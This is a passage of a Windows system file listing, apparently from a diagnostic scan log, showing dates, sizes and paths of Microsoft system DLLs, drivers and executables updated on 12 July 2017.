2017-07-12 09:29 - 2017-07-07 04:13 - 000554392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-07-12 09:29 - 2017-07-07 04:13 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-07-12 09:29 - 2017-07-07 03:57 - 000626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-07-12 09:29 - 2017-07-07 03:57 - 000125344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2017-07-12 09:29 - 2017-07-07 03:39 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-07-12 09:29 - 2017-07-07 03:39 - 000096128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmcmnutils.dll
2017-07-12 09:29 - 2017-07-07 03:37 - 002259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-07-12 09:29 - 2017-07-07 03:31 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-07-12 09:29 - 2017-07-07 03:31 - 001518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-07-12 09:29 - 2017-07-07 03:31 - 000129184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2017-07-12 09:29 - 2017-07-07 03:30 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-07-12 09:29 - 2017-07-07 03:30 - 000949920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2017-07-12 09:29 - 2017-07-07 03:30 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-07-12 09:29 - 2017-07-07 03:29 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-07-12 09:29 - 2017-07-07 03:29 - 000123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll
2017-07-12 09:29 - 2017-07-07 03:27 - 006759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-07-12 09:29 - 2017-07-07 03:26 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-07-12 09:29 - 2017-07-07 03:26 - 001529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-07-12 09:29 - 2017-07-07 03:26 - 001195240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2017-07-12 09:29 - 2017-07-07 03:26 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-07-12 09:29 - 2017-07-07 03:25 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininitext.dll
2017-07-12 09:29 - 2017-07-07 03:23 - 000583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-07-12 09:29 - 2017-07-07 03:22 - 000130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthpan.sys
2017-07-12 09:29 - 2017-07-07 03:14 - 002956800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-07-12 09:29 - 2017-07-07 03:14 - 001448960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-07-12 09:29 - 2017-07-07 03:14 - 000790016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-07-12 09:29 - 2017-07-07 03:13 - 013839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-07-12 09:29 - 2017-07-07 03:12 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-07-12 09:29 - 2017-07-07 03:10 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2017-07-12 09:29 - 2017-07-07 03:10 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapprovp.dll
2017-07-12 09:29 - 2017-07-07 03:09 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-07-12 09:29 - 2017-07-07 03:07 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\raschap.dll
2017-07-12 09:29 - 2017-07-07 03:06 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsExt.dll
2017-07-12 09:29 - 2017-07-07 03:05 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-07-12 09:29 - 2017-07-07 03:05 - 005719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-07-12 09:29 - 2017-07-07 03:05 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2017-07-12 09:29 - 2017-07-07 03:05 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wldap32.dll
2017-07-12 09:29 - 2017-07-07 03:04 - 005961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-07-12 09:29 - 2017-07-07 03:04 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-07-12 09:29 - 2017-07-07 03:04 - 000754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-07-12 09:29 - 2017-07-07 03:04 - 000506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-07-12 09:29 - 2017-07-07 03:04 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-07-12 09:29 - 2017-07-07 03:03 - 006123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-07-12 09:29 - 2017-07-07 03:03 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-07-12 09:29 - 2017-07-07 03:03 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2017-07-12 09:29 - 2017-07-07 03:02 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-07-12 09:29 - 2017-07-07 03:01 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-07-12 09:29 - 2017-07-07 03:00 - 007596544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-07-12 09:29 - 2017-07-07 03:00 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-07-12 09:29 - 2017-07-07 03:00 - 002588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-07-12 09:29 - 2017-07-07 03:00 - 001626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-07-12 09:29 - 2017-07-07 03:00 - 001565184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-07-12 09:29 - 2017-07-07 03:00 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-07-12 09:29 - 2017-07-07 02:59 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-07-12 09:29 - 2017-07-07 02:59 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-07-12 09:29 - 2017-07-07 02:59 - 001355264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll
2017-07-12 09:29 - 2017-07-07 02:59 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-07-12 09:29 - 2017-07-07 02:58 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-07-12 09:29 - 2017-07-07 02:58 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-07-12 09:29 - 2017-07-07 02:58 - 002298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-07-12 09:29 - 2017-07-07 02:58 - 001237504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-07-12 09:29 - 2017-07-07 02:55 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2017-07-12 09:29 - 2017-07-07 02:55 - 000329216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2017-07-12 09:29 - 2017-07-07 02:53 - 001301504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdc.dll
2017-07-12 09:29 - 2017-07-07 02:53 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe
2017-07-12 09:29 - 2017-06-20 03:06 - 000279968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-07-12 09:29 - 2017-06-20 03:02 - 001055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-07-12 09:29 - 2017-06-20 02:34 - 000192416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-07-12 09:29 - 2017-06-20 02:15 - 000455104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAudDecMFT.dll
2017-07-12 09:29 - 2017-06-20 02:13 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2017-07-12 09:29 - 2017-06-20 02:12 - 000264192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbvideo.sys
2017-07-12 09:29 - 2017-06-20 02:12 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys
2017-07-12 09:29 - 2017-06-20 02:09 - 000406032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2017-07-12 09:29 - 2017-06-20 02:08 - 004469840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-07-12 09:29 - 2017-06-20 02:07 - 002475136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2017-07-12 09:29 - 2017-06-20 02:07 - 000346016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-07-12 09:29 - 2017-06-20 02:07 - 000138656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-07-12 09:29 - 2017-06-20 02:06 - 000754592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-07-12 09:29 - 2017-06-20 02:06 - 000278944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2017-07-12 09:29 - 2017-06-20 02:05 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-07-12 09:29 - 2017-06-20 02:05 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2017-07-12 09:29 - 2017-06-20 02:04 - 002330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-07-12 09:29 - 2017-06-20 02:04 - 001178528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2017-07-12 09:29 - 2017-06-20 02:04 - 001077496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll
2017-07-12 09:29 - 2017-06-20 02:04 - 000181656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-07-12 09:29 - 2017-06-20 02:04 - 000049656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msasn1.dll
2017-07-12 09:29 - 2017-06-20 02:03 - 005806048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-07-12 09:29 - 2017-06-20 02:03 - 000864240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-07-12 09:29 - 2017-06-20 02:03 - 000443728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2017-07-12 09:29 - 2017-06-20 02:02 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-07-12 09:29 - 2017-06-20 02:02 - 001121928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-07-12 09:29 - 2017-06-20 02:02 - 000354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-07-12 09:29 - 2017-06-20 02:01 - 000176032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-07-12 09:29 - 2017-06-20 02:00 - 002597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-07-12 09:29 - 2017-06-20 01:49 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfuimanager.dll
2017-07-12 09:29 - 2017-06-20 01:49 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-07-12 09:29 - 2017-06-20 01:46 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-12 09:29 - 2017-06-20 01:45 - 000111104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.RetailInfo.dll
2017-07-12 09:29 - 2017-06-20 01:43 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll
2017-07-12 09:29 - 2017-06-20 01:43 - 000151552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll
2017-07-12 09:29 - 2017-06-20 01:43 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2017-07-12 09:29 - 2017-06-20 01:43 - 000052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll
2017-07-12 09:29 - 2017-06-20 01:42 - 000641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll
2017-07-12 09:29 - 2017-06-20 01:42 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll
2017-07-12 09:29 - 2017-06-20 01:42 - 000226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-07-12 09:29 - 2017-06-20 01:42 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sendmail.dll
2017-07-12 09:29 - 2017-06-20 01:41 - 000734208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-07-12 09:29 - 2017-06-20 01:41 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll
2017-07-12 09:29 - 2017-06-20 01:41 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2017-07-12 09:29 - 2017-06-20 01:41 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2017-07-12 09:29 - 2017-06-20 01:41 - 000201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2017-07-12 09:29 - 2017-06-20 01:40 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-07-12 09:29 - 2017-06-20 01:40 - 000356864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-07-12 09:29 - 2017-06-20 01:40 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2017-07-12 09:29 - 2017-06-20 01:40 - 000247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-07-12 09:29 - 2017-06-20 01:40 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edputil.dll
2017-07-12 09:29 - 2017-06-20 01:40 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll
2017-07-12 09:29 - 2017-06-20 01:39 - 002814464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll
2017-07-12 09:29 - 2017-06-20 01:39 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-07-12 09:29 - 2017-06-20 01:39 - 000969728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2017-07-12 09:29 - 2017-06-20 01:39 - 000646144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2017-07-12 09:29 - 2017-06-20 01:39 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VAN.dll
2017-07-12 09:29 - 2017-06-20 01:39 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2017-07-12 09:29 - 2017-06-20 01:38 - 001451008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-07-12 09:29 - 2017-06-20 01:38 - 001285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-07-12 09:29 - 2017-06-20 01:38 - 001171968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe
2017-07-12 09:29 - 2017-06-20 01:38 - 000648192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2017-07-12 09:29 - 2017-06-20 01:38 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-07-12 09:29 - 2017-06-20 01:36 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-07-12 09:29 - 2017-06-20 01:35 - 002679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-07-12 09:29 - 2017-06-20 01:35 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-07-12 09:29 - 2017-06-20 01:35 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-07-12 09:29 - 2017-06-20 01:34 - 004056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-07-12 09:29 - 2017-06-20 01:34 - 002750464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-07-12 09:29 - 2017-06-20 01:34 - 002211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-07-12 09:29 - 2017-06-20 01:34 - 001492480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-07-12 09:29 - 2017-06-20 01:34 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2017-07-12 09:29 - 2017-06-20 01:31 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-07-12 09:29 - 2017-06-20 01:30 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdmaud.drv
2017-07-12 09:29 - 2017-06-20 01:30 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
2017-07-12 09:29 - 2017-06-20 01:30 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-07-12 09:29 - 2017-06-20 01:28 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll
2017-07-12 09:28 - 2017-07-07 11:00 - 000947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll
2017-07-12 09:28 - 2017-07-07 04:26 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-07-12 09:28 - 2017-07-07 04:25 - 000899824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-07-12 09:28 - 2017-07-07 04:24 - 000117664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-07-12 09:28 - 2017-07-07 04:23 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-07-12 09:28 - 2017-07-07 04:22 - 008318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-07-12 09:28 - 2017-07-07 04:22 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-07-12 09:28 - 2017-07-07 04:21 - 032688336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll
2017-07-12 09:28 - 2017-07-07 04:21 - 002969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-07-12 09:28 - 2017-07-07 04:20 - 002021680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2017-07-12 09:28 - 2017-07-07 04:20 - 000923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-07-12 09:28 - 2017-07-07 04:20 - 000519584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2017-07-12 09:28 - 2017-07-07 04:20 - 000382368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-07-12 09:28 - 2017-07-07 04:14 - 007325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-07-12 09:28 - 2017-07-07 04:14 - 001760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-07-12 09:28 - 2017-07-07 04:12 - 000411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-07-12 09:28 - 2017-07-07 04:12 - 000318232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2017-07-12 09:28 - 2017-07-07 04:11 - 000094624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-07-12 09:28 - 2017-07-07 04:10 - 001670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-07-12 09:28 - 2017-07-07 04:10 - 001325968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-07-12 09:28 - 2017-07-07 04:10 - 000254168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-07-12 09:28 - 2017-07-07 04:09 - 000041376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll
2017-07-12 09:28 - 2017-07-07 04:07 - 001106848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2017-07-12 09:28 - 2017-07-07 04:07 - 000058488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2017-07-12 09:28 - 2017-07-07 03:40 - 023677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-07-12 09:28 - 2017-07-07 03:37 - 031652264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll
2017-07-12 09:28 - 2017-07-07 03:37 - 001339352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll
2017-07-12 09:28 - 2017-07-07 03:27 - 000557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2017-07-12 09:28 - 2017-07-07 03:27 - 000360960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-07-12 09:28 - 2017-07-07 03:26 - 017364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-07-12 09:28 - 2017-07-07 03:23 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-07-12 09:28 - 2017-07-07 03:23 - 000095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-07-12 09:28 - 2017-07-07 03:20 - 023681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-07-12 09:28 - 2017-07-07 03:20 - 008331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-07-12 09:28 - 2017-07-07 03:20 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\prntvpt.dll
2017-07-12 09:28 - 2017-07-07 03:19 - 007149056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2017-07-12 09:28 - 2017-07-07 03:19 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-07-12 09:28 - 2017-07-07 03:18 - 007336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-07-12 09:28 - 2017-07-07 03:18 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2017-07-12 09:28 - 2017-07-07 03:18 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wldap32.dll
2017-07-12 09:28 - 2017-07-07 03:18 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsExt.dll
2017-07-12 09:28 - 2017-07-07 03:17 - 000692736 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2017-07-12 09:28 - 2017-07-07 03:17 - 000588800 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-07-12 09:28 - 2017-07-07 03:17 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-07-12 09:28 - 2017-07-07 03:16 - 012786176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-07-12 09:28 - 2017-07-07 03:16 - 000545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-07-12 09:28 - 2017-07-07 03:15 - 008238080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-07-12 09:28 - 2017-07-07 03:15 - 000922112 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-07-12 09:28 - 2017-07-07 03:14 - 008211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-07-12 09:28 - 2017-07-07 03:14 - 003784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-07-12 09:28 - 2017-07-07 03:14 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2017-07-12 09:28 - 2017-07-07 03:13 - 005892096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-07-12 09:28 - 2017-07-07 03:12 - 004730880 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-07-12 09:28 - 2017-07-07 03:12 - 002499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-07-12 09:28 - 2017-07-07 03:12 - 001142272 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-07-12 09:28 - 2017-07-07 03:12 - 000706560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-07-12 09:28 - 2017-07-07 03:11 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-07-12 09:28 - 2017-07-07 03:11 - 001888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-07-12 09:28 - 2017-07-07 03:11 - 001812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2017-07-12 09:28 - 2017-07-07 03:10 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-07-12 09:28 - 2017-07-07 03:09 - 020504576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-07-12 09:28 - 2017-07-07 03:08 - 000285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2017-07-12 09:28 - 2017-07-07 03:07 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2017-07-12 09:28 - 2017-07-07 03:06 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2017-07-12 09:28 - 2017-07-07 03:06 - 000205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sensrsvc.dll
2017-07-12 09:28 - 2017-07-07 03:05 - 019335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-07-12 09:28 - 2017-07-07 03:05 - 011870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-07-12 09:28 - 2017-07-07 03:04 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2017-07-12 09:28 - 2017-07-07 03:02 - 000508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2017-07-12 09:28 - 2017-07-07 03:01 - 006287360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-07-12 09:28 - 2017-07-07 02:59 - 003656704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-07-12 09:28 - 2017-07-01 19:52 - 000031932 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-07-12 09:28 - 2017-06-20 03:17 - 000034720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
